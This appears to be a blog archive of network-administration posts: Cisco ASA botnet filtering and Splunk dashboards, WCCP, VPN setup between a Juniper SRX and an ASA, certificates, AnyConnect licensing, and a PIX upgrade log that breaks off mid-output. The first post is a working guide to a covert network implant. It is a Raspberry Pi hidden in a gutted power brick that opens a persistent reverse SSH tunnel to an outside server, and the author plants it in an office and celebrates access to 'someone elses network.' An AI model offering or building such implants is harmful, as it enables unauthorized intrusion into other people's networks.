Archive for the ‘Scripts’ Category

When I received my raspberry pi I immediately wanted to use it as a hacking remote tech support tool. The idea was to be able to plug it in somewhere and it be small enough that it’s not noticed in someones network. Then if I could access it remotely I am in their network and can do things.

 

Step 1. Connecting to the Pi

The problem is that if I plug this in somewhere in the world and leave it I need it to phone home so I can gain remote connectivity to it. I know my home’s IP but I don’t know the Pi’s IP. I want it to be a plug in and run away type of scenario and not one that I’ll be hooking up any monitor or keyboard or anything.

First put a linux distro on it. I’ll use cutie pi.

Next set it to receive a remote ssh connection. This is again standard admin stuff.

So now you’re at the point that you can ssh to it remotely if you know its IP. Well you don’t know its IP and even if you did it is probably behind a firewall which makes it impossible to get to. Or so you think.

What you’ll need is a linux server that has a persistent IP. One that you can ssh into from anywhere in the world. Suppose it’s IP is 25.25.25.25.

From the Raspberri Pi you should be able to ssh to this host. So now you want to set it up so the authentication is certificate based (this way the Pi can be set up to auto ssh into the server). From the Pi do the following to create a certificate based authentication.

1. cd ~/.ssh
2. ssh-keygen -t rsa
3. Choose no passphrase when asked and accept the default filename of id_rsa
4. scp id_rsa.pub <user>@<yourhost>:.ssh/authorized_keys
5. Provide your password when asked and that’s the last time you’ll have to do it!

Now comes the fun part. Create a reverse remote ssh tunnel to that host to forward connections back to the Pi. Confused? Here look at this command you would issue from the Pi:

ssh -N -R 2222:localhost:22 [email protected]

The Pi is ssh’ing to the server at 25.25.25.25 using the username “serverUser”. Upon doing so, it’s telling that server to open port 2222. Any connections coming into the server on port 2222 forward them over the tunnel back to the Pi on port 22. The -N tag is saying we don’t need to actually send any ssh commands once connected.

Once the Pi sets up that remote tunnel, from the server it connected to you can do this:

ssh -l piUser -p 2222 localhost

Now you should be ssh’d into the Pi using port 2222 on the linux server! Awesome!

Next is to make this a persistent thing. You want the Pi to keep trying to build this ssh tunnel always and if it goes down try to bring it back. We’ll do this using a bash script and cron job.

Create a file on the Pi called ~/create_ssh_tunnel.sh and put this in it:

#!/bin/bash
createTunnel() {
/usr/bin/ssh -N -R 2222:localhost:22 [email protected]
if [[ $? -eq 0 ]]; then
echo Tunnel to jumpbox created successfully
else
echo An error occurred creating a tunnel to jumpbox. RC was $?
fi
}
/bin/pidof ssh
if [[ $? -ne 0 ]]; then
echo Creating new tunnel connection
createTunnel
fi

What this program is doing is checking to see if there’s a process running called ‘ssh’. If there isn’t then start the ssh tunnel.

Next make it executable by doing the following:

chmod 700 ~/create_ssh_tunnel.sh

Now start the crontab.

crontab -e

Place this in as your cron job (every minute check if the ssh connection is up, if not, attempt to bring it up)

*/1 * * * * ~/create_ssh_tunnel.sh > tunnel.log 2>&1

To troubleshoot any problems in this you can view the tunnel.log file.

Now let’s take a step back and look at what we’ve done. When the Raspberri Pi is on, it will check every minute to see if an ssh connection to your linux server exists. If it doesn’t it will create one. The tunnel it creates is really a reverse remote tunnel. Once the tunnel is up, anyone who ssh’s into port 2222 of the linux server will then be redirected to the Pi. Incredible!

 

Step 2. Concealing the Pi

I found an old powerbrick for a laptop and gutted it.

The raspberry pi almost fit. I had to solder off the S-Video port to get it to fit just right.

Then I had to hook power up to it. In order to do this I simply took apart a USB charger. Took the plastic casing off to save space and cut the cord to save even more space.

Lastly was finding a black ethernet cable so both cables coming out of the power brick are black and look inconspicuous.

Here are pictures of it in it’s special case:

 

 

Step 3. Testing it

Check it out! I have this plugged into an office somewhere. It looks weird when you stare at it but put it behind a plant and nobody will ever notice it (except the guy who waters the plants).

 

Once I plugged it in I went back home. Right after the Pi got an IP address it created a tunnel to my home server. When I tried ssh’ing into port 2222 of my home server I was redirected to the Pi. Now I am on a computer in someone elses network. Woohoo!

 

 

Information regarding the Cisco ASA Botnet License.

What is it?

Botnet Traffic Filter is an extra license that can be applied to a Cisco ASA firewall that provides detection and automatic blocking of known bots and botnets. The firewall grabs updates from Cisco’s website to know which IPs to look for and block.

Besides stopping outside botnets from coming into the network the botnet filter is also very effective at identifying which hosts may have malicious software within the network. It will stop internal hosts from going out to a known botnet IP. It has the ability to listen for call-home or command/control behavior seen within the network.

 

License

It is time based. The SKU is something like L-ASA55xx-BOT-1YR=

It costs between $200-$500 per year. I will only fully work on version 8.2.2 and up.

Purchase license. Apply it using the activation-key command.

Requires the 3DES/AES license (this license is free but does not ship with an ASA).

 

Initial Configuration

The firewall needs to communicate to update-manifests.ironport.com. This means it has to have a valid DNS lookup mechanism. To get this going do something like the following:

dns domain-lookup INSIDE
DNS server-group DefaultDNS
name-server 10.2.2.2

There are over 70,000 DNS names that are in the Cisco database and only 5000 IP addresses. To effectively look at each domain name, DNS snooping must be turned on. To do that issue the following commands:

 class-map dynamic-filter_snoop_class
match port udp eq domain

policy-map global_policy
class dynamic-filter_snoop_class
inspect dns preset_dns_map dynamic-filter-snoop

 

Next turn on the dynamic-filters. I like to start by blocking everything that is blacklisted and whitelist the CEO’s IP from being blocked. Do this by issuing the following commands:

dynamic-filter updater-client enable
dynamic-filter use-database
dynamic-filter enable interface OUTSIDE
dynamic-filter drop blacklist interface OUTSIDE
dynamic-filter whitelist
address 10.1.4.4 255.255.255.255

 

Checking to see what’s happening

Verify the ASA is downloading the rules:

show dynamic-filter updater-client

Verify traffic is being inspected:

show dynamic-filter statistics

View which hosts are being blocked:

show dynamic-filter reports infected-host all

 

Using Splunk to see even more

If you are collecting syslogs within in Splunk you can create a cool dashboard to give statistics based over time. Here is the code for a dashboard that could be used for that purpose (note this would require the Splunk for Cisco ASA plugin):

<?xml version=’1.0′ encoding=’utf-8′?>
<form>
<label>Botnet Information by host</label>

<!– define master search template; leave time unbounded so that the time input can be used –>

<fieldset>

<input type=”text” token=”host”>
<label>Host</label>
</input>

<!– add default TimePicker –>
<input type=”time” />

</fieldset>

<row>
<chart>
<title>Botnet activity. Tracked by whether the source or destination is blacklisted</title>
<searchTemplate>$host$ error_code=338007 OR error_code=338006 OR error_code=338008 | rex field=_raw “, (?&lt;srcdst&gt;[\w]+) \d” | timechart span=1hr count by srcdst</searchTemplate>
<option name=”charting.chart”>line</option>
<option name=”charting.legend.placement”>right</option>
</chart>
</row>

<row>
<chart>
<title>External blacklisted IPs are targetting these systems</title>
<searchTemplate>$host$ error_code=338007 | rex field=_raw “from (?&lt;Source&gt;[^\']+) to (?&lt;Destination&gt;[^\']+), source.*threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)” | timechart span=30min count by Destination</searchTemplate>
<option name=”charting.chart”>line</option>
<option name=”charting.legend.placement”>right</option>
</chart>
</row>
<row>
<chart>
<title>Internal systems that are targetting external blacklisted IPs</title>
<searchTemplate>$host$ error_code=338008 OR error_code=338006 | rex field=_raw “from (?&lt;Source&gt;[^\']+) to.*resolved from dynamic list:(?&lt;Destination&gt;[^\']+), threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)” | timechart span=30m count by Source</searchTemplate>
<option name=”charting.chart”>line</option>
<option name=”charting.legend.placement”>right</option>
</chart>
</row>

<row>

<single>
<searchTemplate>$host$ error_code=444005 earliest_time=-1d | rex field=_raw “will expire in (?&lt;avg&gt;[^\']+) days” | chart min(avg)</searchTemplate>
<title>Botnet license expires in this many days (444005)</title>
</single>
<single>
<searchTemplate>$host$ error_code=338007 | chart count</searchTemplate>
<title>Total denied incoming connections due to botnet filter</title>
</single>
<single>
<searchTemplate>$host$ error_code=338006 OR error_code=338008 | chart count</searchTemplate>
<title>Total denied outgoing connections due to botnet filter</title>
</single>

</row>
<row>

<table>
<title>Top 10 denied traffic flows due to blacklisted source IP (338007)</title>
<searchTemplate>$host$ error_code=338007 | rex field=_raw “from (?&lt;Source&gt;[^\']+) to (?&lt;Destination&gt;[^\']+), source.*threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)” | stats count by Source Destination Threat_Level Category | sort 10 -count</searchTemplate>
</table>

<table>
<title>Top 10 denied traffic flows due to blacklisted destination IP (338006, 338008)</title>
<searchTemplate>$host$ error_code=338008 OR error_code=338006 | rex field=_raw “from (?&lt;Source&gt;[^\']+) to.*resolved from dynamic list:(?&lt;Destination&gt;[^\']+), threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)” | stats count by Source Destination Threat_Level Category | sort 10 -count</searchTemplate>
</table>

</row>

<row>

<table>
<title>Top 10 addresses for message: URL Timed Out, Removing Rule (338303)</title>
<searchTemplate>$host$ error_code=338303 | rex field=_raw “Address (?&lt;avg&gt;[^\']+) timed out” | stats count by avg | sort 10 -count</searchTemplate>
</table>

</row>

</form>

 

 

 

More information on Cisco’s website:

http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/guide/conns_botnet.html#wp1129967

 

 

To copy a file from an FTP server to the flash of a ASA you could do the following:

copy ftp flash

Which will then prompt you for all the details (username/password/location/file). But there is a better way which will allow you to put all of that information on one line.

To indicate all of the details on one line you can do:

copy ftp://ftpuser:[email protected]/asa/asa825-41-k8.bin flash

This indicates the username is ftpuser, with the password of PassworD with the location of the ftp server  at 192.168.5.50 with the filename asa825-41-k8.bin

Today we are going to set up a Cisco ASA firewall to send WCCP (port 80) web inspection traffic to a Cisco Ironport WSA (Web Security Appliance).

Suppose the following:

Ironport WSA IP address: 192.168.5.55

Inside IP of ASA firewall: 192.168.5.1

Inside IP address range: 192.168.0.0/16

 

Cisco ASA firewall configuration:

! Define the Ironport IP Address in an ACL
access-list ACL-IRONPORT-WSA extended permit ip host 192.168.5.55 any

! Define what traffic should be inspected
access-list ACL-WEBPROXY-TRAFFIC extended permit tcp 192.168.0.0 255.255.0.0 any eq www

! Apply the WCCP configuration
wccp web-cache redirect-list ACL-WEBPROXY-TRAFFIC group-list ACL-IRONPORT-WSA
wccp interface INSIDE web-cache redirect in

 

Now configure the Ironport.

Navigate to Network -> Transparent Redirection

Make the type WCCP v2 Router

Add a service with a name of WEB_CACHE, a router IP of 192.168.5.1 (ASA Inside IP) and port 80 (Standard).

 

At this point you can do a ‘show wccp’ on the ASA and you should see “Total Packets Redirected” rising. From within the Ironport go to Reporting -> Overview and you should see statistics of what traffic is now flowing through the Ironport.

 

Troubleshooting techniques:

• Verify basic connectivity. Check interface IP addresses. Verify network access between both ASA and Ironport.
• Show commands on ASA: show wccp
• Debug commands on firewall: debug wccp packet, debug wccp events
• Verify the ports caught in the traffic ACL are the same as the ports used for WCCP and there’s a listener (service) on Ironport to interpret them.

Vulnerability scanners are reporting that ssh version 1 is on by default for Cisco IPS units. It is fairly simple to turn this off on the IPS if you have service level privilege.

First get into the service level account. This is essentially the linux shell under the IPS. Once you are ssh’d in, issue these commands.

su

vi /etc/ssh/sshd_config

Change the line that says:

#Protocol 2,1

Uncomment it and take out the ‘,1′ so it looks like this:

Protocol 2

Save the file and exit out of vi.

Restart the ssh daemon. (Warning: This may cause a failover if these are IPSMs in a failover pair).

/etc/init.d/S60ssh restart

Now you can test ssh’ing into your device and you should see this error:

[user@linuxbox1 ~]$ ssh 10.50.50.10 -1
Protocol major versions differ: 1 vs. 2

Voila, ssh version 1 is now disabled!

 

 

Blue firewall: Juniper SRX 210 (JunOS 10.0R1.8)

Red firewall: Cisco ASA 5510 (OS 8.4)

This is a script to create a site to site VPN tunnel between a Cisco ASA and a Juniper SRX. The Juniper SRX will be using a policy based VPN.

 

 

Blue Juniper SRX

# Create the IKE proposal
set security ike proposal IKE-SHA-AES128-DH1 authentication-method pre-shared-keys
set security ike proposal IKE-SHA-AES128-DH1 dh-group group2
set security ike proposal IKE-SHA-AES128-DH1 encryption-algorithm aes-128-cbc
set security ike proposal IKE-SHA-AES128-DH1 authentication algorithm sha1
set security ike proposal IKE-SHA-AES128-DH1 lifetime-seconds 86400

# Create the IKE policy
set security ike policy IKE-POLICY-HQ mode main
set security ike policy IKE-POLICY-HQ proposals IKE-SHA-AES128-DH1
set security ike policy IKE-POLICY-HQ pre-shared-key ascii-text s3kreTKey

# Create an IKE gateway
set security ike gateway IKE-GATEWAY-HQ ike-policy IKE-POLICY-HQ
set security ike gateway IKE-GATEWAY-HQ address 22.22.22.22
set security ike gateway IKE-GATEWAY-HQ external-interface ge-0/0/0.0

# Create an IPSec proposal/transform set
set security ipsec proposal IPSEC-SHA-AES128-ESP encryption-algorithm aes-128-cbc
set security ipsec proposal IPSEC-SHA-AES128-ESP authentication-algorithm hmac-sha1-96
set security ipsec proposal IPSEC-SHA-AES128-ESP protocol esp
set security ipsec proposal IPSEC-SHA-AES128-ESP lifetime-seconds 3600

# Create a IPSec policy
set security ipsec policy VPN-POLICY-HQ proposals IPSEC-SHA-AES128-ESP

# Create the IPSec VPN
set security ipsec vpn VPN-HQ ike gateway IKE-GATEWAY-HQ
set security ipsec vpn VPN-HQ ike ipsec-policy VPN-POLICY-HQ

# Add some networks into the address book
set security zones security-zone OUTSIDE address-book address NET-REMOTE-VPN 172.16.22.0/24
set security zones security-zone INSIDE address-book address NET-LOCAL 192.168.11.0/24

# Create the policies to define the interesting traffic
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT match source-address NET-LOCAL
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT match destination-address NET-REMOTE-VPN
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT match application any
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT then permit tunnel ipsec-vpn VPN-HQ
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT then permit tunnel pair-policy VPN-POLICY-HQ-IN

set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN match source-address NET-REMOTE-VPN
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN match destination-address NET-LOCAL
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN match application any
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN then permit tunnel ipsec-vpn VPN-HQ
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN then permit tunnel pair-policy VPN-POLICY-HQ-OUT

# You want to exclude the VPN traffic from being NAT’d
set security nat source rule-set NAT-INTERFACE rule NO-NAT match source-address 192.168.11.0/24
set security nat source rule-set NAT-INTERFACE rule NO-NAT match destination-address 172.16.22.0/24
set security nat source rule-set NAT-INTERFACE rule NO-NAT then source-nat off

# My config already had a rule in the rule-set. So I had to move the new rule above the old rule so it processes the no nat first.
insert source rule-set NAT-INTERFACE rule NO-NAT before rule RULE-NAME

Red Cisco ASA Firewall

! Define the interesting traffic
access-list ACL-VPN-SRX extended permit ip 172.16.22.0 255.255.255.0 192.168.11.0 255.255.255.0

! Set the IKE parameters
crypto ikev1 enable OUTSIDE
crypto ikev1 policy 5
authentication pre-share
encryption aes
hash sha
group 2
lifetime 86400

! Create the IPSec settings
crypto ipsec ikev1 transform-set ESP-AES128-SHA esp-aes esp-sha-hmac
crypto map MAP-VPN 10 match address ACL-VPN-SRX
crypto map MAP-VPN 10 set peer 11.11.11.11
crypto map MAP-VPN 10 set ikev1 transform-set ESP-AES128-SHA
crypto map MAP-VPN interface OUTSIDE

! Create the tunnel group
tunnel-group 11.11.11.11 type ipsec-l2l
tunnel-group 11.11.11.11 ipsec-attributes
ikev1 pre-shared-key s3kreTKey

! In my case I needed to tell this VPN traffic to not be NAT’d as it goes through the firewall
object network OBJ-172.16.22.0
subnet 172.16.22.0 255.255.255.0
object network OBJ-192.168.11.0
subnet 192.168.11.0 255.255.255.0
nat (INSIDE,OUTSIDE) source static OBJ-172.16.22.0 OBJ-172.16.22.0 destination static OBJ-192.168.11.0 OBJ-192.168.11.0 no-proxy-arp description No NAT for VPN to SRX

There is a great tool to generate the Juniper SRX code on Juniper’s site:

https://www.juniper.net/customers/support/configtools/vpnconfig.html

 

To build the Juniper config I used this page as a reference guide:

http://www.juniper.net/techpubs/en_US/junos/topics/example/policy-based-vpn-using-j-series-srx-series-device-configuring.html

 

 

 

This tutorial is to show you how to install a HTTPS/SSL certificate on an ASA. This is often used when WebVPN or AnyConnect is configured which uses SSL. Without a certificate installed the users is given warnings and errors about a missing or invalid certificate.

This has nothing to do with authentication. It’s simply the https certificate which is needed for a secure communication to be set up.

Suppose you are working for a place called http://company.com and they want to set up their ASA to allows users to VPN into the network. To access the VPN you can either use IPSec or SSL. Suppose their choice was SSL and they want the URL of the ASA to be https://vpn.company.com. This tutorial will help set the HTTPS certificate for that URL.

It is easier for me to use ASDM when dealing with certificates so this tutorial uses ASDM exclusively.

Step 1 – Create an Identity Certificate

Under Configuration -> Device Management -> Certificate Management -> Identity Certificates

Click Add.

Give the Trustpoint a Name.

Choose “Add” a new identity certificate

Choose the key pair to use for encryption.

Click “Select” for the certificate subject DN. In this section it is important to make the CN = the URL of the ASA that this certificate will be serving. It doesn’t need to have any trailing slashes. So if the URL is “https://example.com/owa” you can simply make the CN “example.com”.

Click “advanced”.

Fill in the FQDN field. This should be exactly the same as CN.

Click Add certificate.

Step 2 – Send the certificate to the CA

After completing step 1 you will be presented with the option of saving your certificate.

Send this certificate to the CA such as Symantec or Verisign. They will then process it and send you back your public certificate

Step 3 – Installing your certificate

Go back to the ASDM: Configuration -> Device Management -> Certificate Management -> Identity Certificates

Click the certificate you made earlier. Then click Install.

Paste in the certificate the CA sent you. Paste in everything including the BEGIN CERTIFICATE and END CERTIFICATE portions but make sure there are no trailing spaces or carriage returns. You do not need any of the intermediate keys, simply the public cert.

Step 4 – Enabling your certificate on an interface

Go to Configuration -> Remote Access VPN -> Network (client) access -> AnyConnect Connection Profiles

Click Device Certificate

Choose the certificate you installed as the one to use for when users HTTPS to this device.

 

That’s it! Test the functionality by going to the URL of your ASA by using HTTPS.

 

 

 

 

This post will try to help understand the differences between anyconnect premium and anyconnect essentials licenses.

Note: You cannot have both Essentials and Premium running at once.

Note: Cisco ASA 8.3+ no longer requires both the Active and Standby unit to each have a license. The active license is shared between the failover units. This should not be confused with the ‘shared premium license’.

Note: Cisco Secure Desktop is now deprecated. Cisco has stopped development for it.

Source of this image: Cisco’s Partner Education center – ASA Licensing Webex.

To enable AnyConnect essentials:

Purchase the license (L-ASA-AC-E-55xx= it costs $100-$500).

Apply the license to the ASA using the ‘activation-key’ command. This does not require a reboot.

Apply the config:

webvpn
 anyconnect-essentials

Now your firewall will be licensed to have up to however many connections that are on the “Total VPN Connections”. For instance if your show version says this:

AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Enabled        perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual

You will now be licensed to accommodate 250 anyconnect connections.

 

To enable AnyConnect Premium

Buy the license. You must purchase a license for a specific number of users (L-ASA-SSL-10= costs around $800).

Apply the license to the ASA using the ‘activation-key’ command. This does not require a reboot.

Configure the ASA:

webvnp
  no anyconnect-essentials

If you’ve already licensed this ASA for Essentials in the past then it will still show as an enabled license.

Once this is complete your ASA will be licensed to accept however many Anyconnect connections as you have Premium Licenses for. So if your ‘show version’ looks like this:

AnyConnect Premium Peers          : 10             perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual

Then your ASA can have 10 Anyconnect users at once.

Note: The name “Anyconnect Premium” has changed a lot in different versions. Here are the different naming schemes.
7.1(1) known as “ssl vpn”
8.2(1) name changed to “anyconnect premium ssl vpn edition”
8.3(1) name changed to “anyconnect premium ssl vpn”
8.4(1) name changed to “anyconnect premium”

 

AnyConnect for Mobile

This license allows AnyConnect connections from mobile devices. There is current support for iPhone, iPad, Android IceCream Sandwich, rooted Androids and Samsung Galaxy’s.

The mobile license is on or off and not tied to a number of users. It costs between $100-$500.

This license is applied by simply using the ‘activation-key’ command. A reboot is not needed. There is no further configuration needed after that.

 

Advanced Endpoint Assessment

Advanced Endpoint Assessment includes all of the Endpoint Assessment features, and lets you configure an attempt to update noncompliant computers to meet version requirements.

This license is applied by simply using the ‘activation-key’ command. A reboot is not needed.

 

Shared Premium License

New to ASA 8.3+ code is the ability to share licensing. This is only for Anyconnect Premium. It allows for one ASA to have a shared license which other ASAs can use.

This configuration requires two extra licenses. A license is needed for the shared server which indicates how many shared licenses there are and there also is a need for any participating ASAs.

After buying a shared participant license and applying it with the ‘activation-key’ command, configure it with a command similar to this:

license-server address 10.15.0.15 secret SeKreTkey

The ‘show version’ on the participant ASA will show this:

AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 5000           perpetual
Total VPN Peers                   : 5000           perpetual
Shared License                    : Enabled        perpetual

 

Now buy the shared premium license for the server for the amount of users you wish to have.

Apply the license using the ‘activation-key’ command. Then apply the following config:

license-server secret SeKreTkey
license-server enable inside

The ‘show version’ at this point looks like this:

AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 5000           perpetual
Total VPN Peers                   : 5000           perpetual
Shared License                    : Enabled        perpetual

Also you can see the ‘show shared license‘ output:

Shared license utilization:
  AnyConnect Premium:
    Total for network :     5000
    Available         :     4900
    Utilized          :      100
  This device:
    Platform limit    :     5000
    Current usage     :       50
    High usage        :      100
  Messages Tx/Rx/Error:
    Registration    : 441798 / 441789 / 9
    Get             : 28 / 28 / 0
    Release         : 27 / 27 / 0
    Transfer        : 0 / 0 / 0

  Client ID           Usage   Hostname
  JMX1111             50      vpn-asa-01

The Cisco PIX 506E is only supposed to run code up to 6.3.5. It is however possible to go higher. In order to do this you need to have your PIX 506E have 64MB of RAM. In order for me to do this I had to double up my current RAM. The PIX 506E had only 28MB of RAM however the 506E has two memory slots and can easily upgrade to 64MB if you have another stick (or PIX you aren’t using).

Version 7.1.2 is chosen as the best code because it fits on the system which has 8MB of flash. This means there will be no room left for an ASDM. At some point in the 7.x versions, Cisco put instructions in the firmware to prevent 8.0 code to run if the model is PIX506e. This can actually be overcome by rewriting the .bin file (using lzma) to change any CRC check to PIX506E instead of PIX515E. There are a total of 6 CRC checks that need to be switched to conduct this. This post does not cover how to upgrade above 7.1.2.

Once I had the memory installed this was my console output during my upgrade procedure.

SETUP: TFTP Server:192.168.5.1
PIX: 192.168.5.2
Consoled into PIX.

CISCO SYSTEMS PIX FIREWALL
Embedded BIOS Version 4.3.207 01/02/02 16:12:22.73
Compiled by morlee
64 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class Irq
00 00 00 8086 7192 Host Bridge
00 07 00 8086 7110 ISA Bridge
00 07 01 8086 7111 IDE Controller
00 07 02 8086 7112 Serial Bus 9
00 07 03 8086 7113 PCI Bridge
00 0D 00 8086 1209 Ethernet 11
00 0E 00 8086 1209 Ethernet 10

Cisco Secure PIX Firewall BIOS (4.2) #0: Mon Dec 31 08:34:35 PST 2001
Platform PIX-506E
System Flash=E28F640J3 @ 0xfff00000

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Reading 1974784 bytes of image from flash.
#################################################################################################################
64MB RAM
mcwa i82559 Ethernet at irq 11 MAC: 001a.a2a4.5c33
mcwa i82559 Ethernet at irq 10 MAC: 001a.a2a4.5c32
System Flash=E28F640J3 @ 0xfff00000
BIOS Flash=am29f400b @ 0xd8000

———————————————————————–
|| ||
|| ||
|||| ||||
..:||||||:..:||||||:..
c i s c o S y s t e m s
Private Internet eXchange
———————————————————————–
Cisco PIX Firewall

Cisco PIX Firewall Version 6.3(5)
Licensed Features:
Failover: Disabled
VPN-DES: Enabled
VPN-3DES-AES: Enabled
Maximum Physical Interfaces: 2
Maximum Interfaces: 4
Cut-through Proxy: Enabled
Guards: Enabled
URL-filtering: Enabled
Inside Hosts: Unlimited
Throughput: Unlimited
IKE peers: Unlimited

This PIX has a Restricted (R) license.

Cryptochecksum(unchanged): 6a5b0c6c fd46250c 3dd9bb06 a6df7e62
Type help or ‘?’ for a list of available commands.
pixfirewall> en
Password:
pixfirewall(config)# no dhcpd address 192.168.1.2-192.168.1.254 inside
DHCPD disabled on inside interface because address pool is removed
pixfirewall(config)# no dhcpd enable inside
pixfirewall(config)# ip address inside 192.168.5.2 255.255.255.0
pixfirewall(config)# ping 192.168.5.1
192.168.5.1 response received — 0ms
192.168.5.1 response received — 0ms
192.168.5.1 response received — 0ms
pixfirewall(config)# exit
pixfirewall# wr mem
Building configuration…
Cryptochecksum: 5ca481c6 1487c90e c50ead2b a3088231
[OK]
pixfirewall# clear flashfs
pixfirewall# sh flash
flash file system: version:0 magic:0×0
file 0: origin: 0 length:0
file 1: origin: 0 length:0
file 2: origin: 0 length:0
file 3: origin: 0 length:0
file 4: origin: 0 length:0
file 5: origin: 0 length:0
pixfirewall# reboot
Proceed with reload? [confirm]

Rebooting..ÿ

CISCO SYSTEMS PIX FIREWALL
Embedded BIOS Version 4.3.207 01/02/02 16:12:22.73
Compiled by morlee
64 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class Irq
00 00 00 8086 7192 Host Bridge
00 07 00 8086 7110 ISA Bridge
00 07 01 8086 7111 IDE Controller
00 07 02 8086 7112 Serial Bus 9
00 07 03 8086 7113 PCI Bridge
00 0D 00 8086 1209 Ethernet 11
00 0E 00 8086 1209 Ethernet 10

Cisco Secure PIX Firewall BIOS (4.2) #0: Mon Dec 31 08:34:35 PST 2001
Platform PIX-506E
System Flash=E28F640J3 @ 0xfff00000

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
[Hit ESC]
Flash boot interrupted.
0: i8255X @ PCI(bus:0 dev:14 irq:10)
1: i8255X @ PCI(bus:0 dev:13 irq:11)

Using 1: i82557 @ PCI(bus:0 dev:13 irq:11), MAC: 001a.a2a4.5c33
Use ? for help.
monitor> address 192.168.5.2
address 192.168.5.2
monitor> server 192.168.5.1
server 192.168.5.1
monitor> file pix712.bin
file pix712.bin
monitor> tftp
tftp [email protected]…………………………………………………………………….
Received 6764544 bytes

Cisco PIX Security Appliance admin loader (3.0) #0: Tue Mar 14 16:46:07 PST 2006
#############################################################
64MB RAM

Total NICs found: 2
mcwa i82559 Ethernet at irq 11 MAC: 001a.a2a4.5c33
mcwa i82559 Ethernet at irq 10 MAC: 001a.a2a4.5c32
BIOS Flash=am29f400b @ 0xd8000
Old file system detected. Attempting to save data in flash

Initializing flashfs…
flashfs[7]: Checking block 0…block number was (-2131)
flashfs[7]: erasing block 0…done.
flashfs[7]: Checking block 1…block number was (-12656)
flashfs[7]: erasing block 1…done.
flashfs[7]: Checking block 2…block number was (-31472)
flashfs[7]: erasing block 2…done.
flashfs[7]: Checking block 3…block number was (32183)
flashfs[7]: erasing block 3…done.
flashfs[7]: Checking block 4…block number was (27050)
flashfs[7]: erasing block 4…done.
flashfs[7]: Checking block 5…block number was (10385)
flashfs[7]: erasing block 5…done.
flashfs[7]: Checking block 6…block number was (27686)
flashfs[7]: erasing block 6…done.
flashfs[7]: Checking block 7…block number was (1814)
flashfs[7]: erasing block 7…done.
flashfs[7]: Checking block 8…block number was (22750)
flashfs[7]: erasing block 8…done.
flashfs[7]: Checking block 9…block number was (11436)
flashfs[7]: erasing block 9…done.
flashfs[7]: Checking block 10…block number was (10399)
flashfs[7]: erasing block 10…done.
flashfs[7]: Checking block 11…block number was (-4384)
flashfs[7]: erasing block 11…done.
flashfs[7]: Checking block 12…block number was (10801)
flashfs[7]: erasing block 12…done.
flashfs[7]: Checking block 13…block number was (3939)
flashfs[7]: erasing block 13…done.
flashfs[7]: Checking block 14…block number was (29271)
flashfs[7]: erasing block 14…done.
flashfs[7]: Checking block 15…block number was (3)
flashfs[7]: erasing block 15…done.
flashfs[7]: Checking block 16…block number was (-12561)
flashfs[7]: erasing block 16…done.
flashfs[7]: Checking block 17…block number was (-17835)
flashfs[7]: erasing block 17…done.
flashfs[7]: Checking block 18…block number was (25075)
flashfs[7]: erasing block 18…done.
flashfs[7]: Checking block 19…block number was (18017)
flashfs[7]: erasing block 19…done.
flashfs[7]: Checking block 20…block number was (21479)
flashfs[7]: erasing block 20…done.
flashfs[7]: Checking block 21…block number was (-3643)
flashfs[7]: erasing block 21…done.
flashfs[7]: Checking block 22…block number was (-18350)
flashfs[7]: erasing block 22…done.
flashfs[7]: Checking block 23…block number was (25412)
flashfs[7]: erasing block 23…done.
flashfs[7]: Checking block 24…block number was (8285)
flashfs[7]: erasing block 24…done.
flashfs[7]: Checking block 25…block number was (-11600)
flashfs[7]: erasing block 25…done.
flashfs[7]: Checking block 26…block number was (-32046)
flashfs[7]: erasing block 26…done.
flashfs[7]: Checking block 27…block number was (1769)
flashfs[7]: erasing block 27…done.
flashfs[7]: Checking block 28…block number was (-28376)
flashfs[7]: erasing block 28…done.
flashfs[7]: Checking block 29…block number was (-19639)
flashfs[7]: erasing block 29…done.
flashfs[7]: Checking block 30…block number was (-20657)
flashfs[7]: erasing block 30…done.
flashfs[7]: Checking block 31…block number was (3744)
flashfs[7]: erasing block 31…done.
flashfs[7]: Checking block 32…block number was (-11933)
flashfs[7]: erasing block 32…done.
flashfs[7]: Checking block 33…block number was (17275)
flashfs[7]: erasing block 33…done.
flashfs[7]: Checking block 34…block number was (23299)
flashfs[7]: erasing block 34…done.
flashfs[7]: Checking block 35…block number was (-13460)
flashfs[7]: erasing block 35…done.
flashfs[7]: Checking block 36…block number was (10511)
flashfs[7]: erasing block 36…done.
flashfs[7]: Checking block 37…block number was (-10457)
flashfs[7]: erasing block 37…done.
flashfs[7]: Checking block 38…block number was (30155)
flashfs[7]: erasing block 38…done.
flashfs[7]: Checking block 39…block number was (7950)
flashfs[7]: erasing block 39…done.
flashfs[7]: Checking block 40…block number was (-13108)
flashfs[7]: erasing block 40…done.
flashfs[7]: Checking block 41…block number was (-13108)
